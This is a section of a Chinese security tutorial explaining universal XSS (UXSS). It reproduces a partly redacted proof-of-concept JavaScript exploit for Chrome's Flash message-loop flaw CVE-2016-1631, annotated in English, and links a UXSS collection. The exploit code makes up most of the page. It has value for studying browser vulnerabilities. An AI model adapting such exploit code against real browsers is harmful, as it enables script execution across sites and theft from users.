1.3.11 Uxss

UXSS 全称 Universal Cross-Site Scripting，翻译过来就是通用型 XSS，也叫 Universal XSS。与普通 XSS 不同，UXSS 利用的是浏览器或浏览器插件本身的漏洞，而不是某个具体网站的漏洞，因此不受站点限制、可以在任意源下执行脚本。

以 Chrome 浏览器 Flash message loop 使用不当导致的 UXSS 漏洞（CVE-2016-1631）为例

POC 如下（注意：下面代码中的部分字符串已被站点过滤器替换为 `[removed]`，且引用的 p.swf、f.html 未在本页给出，因此这里展示的并非完整代码）

// Shared state for the whole listing (top-level `var`s, so also window properties).
var c0 = 0;   // bumped by cp(); c() polls it until it reaches 10
var c1 = 0;   // bumped by f(); only f()'s second call does any work
var fs = [];  // the iframes created by the loop below; ml() consumes them with pop()
/**
 * Counts one callback: increments the shared counter c0.
 * Nothing on this page calls cp() directly — presumably each loaded p.swf
 * instance invokes it; c() waits until the count reaches 10.
 */
function cp() {
  c0 += 1;
}
// Append ten iframes to the document, each loading the same Flash object
// (p.swf, not shown on this page), and remember their elements in fs.
// `var a` / `var i` are top-level vars here, so they leak as globals.
for (var a = 0; a < 10; a++) {
  var i = document.documentElement.appendChild(document.createElement('iframe'));
  i.src = 'p.swf';
  fs.push(i);
}
/**
 * Consumes one iframe from fs per call.
 *
 * As written, each call:
 *  1. pops the most recently created iframe and takes its window — once fs
 *     is empty, pop() returns undefined and the `.contentWindow` access
 *     throws a TypeError; f() below relies on that throw to leave its loop;
 *  2. names that window 'p' + (number of iframes still left in fs);
 *  3. calls f() on the first <embed> in that frame's document — a property of
 *     the plugin element (presumably exposed by p.swf), not the global f()
 *     defined further down in this listing;
 *  4. navigates the window with that name to about:blank through a synthetic
 *     anchor click (a.target equals the name set in step 2);
 *  5. once fewer than 6 iframes remain, busy-waits for about 1 s, which blocks
 *     the main thread; the page gives no reason for the threshold or the delay.
 */
function ml() {
  var pw = fs.pop().contentWindow;
  pw.name = 'p' + fs.length;
  pw.document.querySelector('embed').f();
  var a = document.createElement('a');
  a.href = 'about:blank';
  a.target = 'p' + fs.length;
  a.click();
  if (fs.length < 6) {
    var then = Date.now();
    while (Date.now() - then < 1000) {}
  }
}
/**
 * Second-stage callback; only its second invocation (++c1 == 2) does anything.
 * Its caller is not on this page — presumably content inside the f.html frame
 * created by c().
 *
 * `x` is the iframe assigned in c() (an undeclared global). x1 is the element
 * following the first sub-frame of that iframe; it is pointed at an external
 * URL, after which ml() is called repeatedly while x1.contentDocument is still
 * readable. The loop ends either when that document stops being reachable from
 * this origin (contentDocument is null for a cross-origin frame) or, via the
 * catch, when ml() throws after fs has been exhausted.
 *
 * The string assigned to x1.src in the catch block has been redacted by the
 * page's sanitizer: the '[removed]' tokens replace text that is not shown,
 * so the literal here is not what the original POC contained.
 */
function f() {
  if (++c1 == 2) {
    var x1 = x.contentWindow[0].frameElement.nextSibling;
    x1.src = 'https://abc.xyz';
    try {
      while (x1.contentDocument) { ml(); }
    } catch(e) {
      x1.src = '[removed]if(location!="about:blank")alert([removed])';
    }
  }
}
/**
 * Poll step, run every 100 ms by the interval stored in t (last line of the
 * listing). Does nothing until c0 reaches 10 — i.e. cp() has run ten times,
 * matching the ten iframes created above — then stops the interval and
 * appends one more iframe loading f.html (not shown on this page).
 *
 * Note: `x` is assigned without any declaration, so it becomes an implicit
 * global (a ReferenceError under 'use strict'); f() reads it by that name.
 */
function c() {
  if (c0 == 10) {
    clearInterval(t);
    x = document.documentElement.appendChild(document.createElement('iframe'));
    x.src = 'f.html';
  }
}
// Start polling c() every 100 ms; c() clears this interval itself once c0 == 10.
var t = setInterval(c, 100);

一个致力于收集uxss的数据库

https://github.com/Metnew/uxss-db
